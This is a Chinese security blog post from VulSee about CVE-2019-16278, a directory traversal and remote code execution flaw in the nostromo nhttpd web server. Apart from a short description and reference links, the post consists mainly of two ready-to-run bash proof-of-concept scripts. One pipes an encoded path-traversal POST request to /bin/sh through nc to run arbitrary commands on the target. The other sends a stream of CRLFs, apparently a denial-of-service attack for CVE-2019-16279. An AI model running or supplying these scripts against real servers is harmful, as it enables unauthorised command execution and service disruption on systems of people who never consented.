微慑信息网

nostromo nhttpd 目录穿越及远程代码执行漏洞CVE-2019-16278[附PoC]

CVE-2019-16278

nostromo nhttpd是一款开源的Web服务器。

nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

 

 

http://www.nazgul.ch/dev/nostromo_man.html

(这玩意好像很小众啊..为什么漏洞一出就这么火,难道以为是httpd?)

 

https://www.exploit-db.com/exploits/35466

https://nvd.nist.gov/vuln/detail/CVE-2019-16278

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278

拓展阅读(点评/知识):

POC:

CVE-2019-16278.sh

#!/usr/bin/env bash

HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

CVE-2019-16279.sh

#!/usr/bin/env bash

HOST="$1"
PORT="$2"

echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT"

 

 

 

本文标题:nostromo nhttpd 目录穿越及远程代码执行漏洞CVE-2019-16278[附PoC]
本文链接:
(转载请附上本文链接)
https://vulsee.com/archives/vulsee_2019/1015_9083.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » nostromo nhttpd 目录穿越及远程代码执行漏洞CVE-2019-16278[附PoC]
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们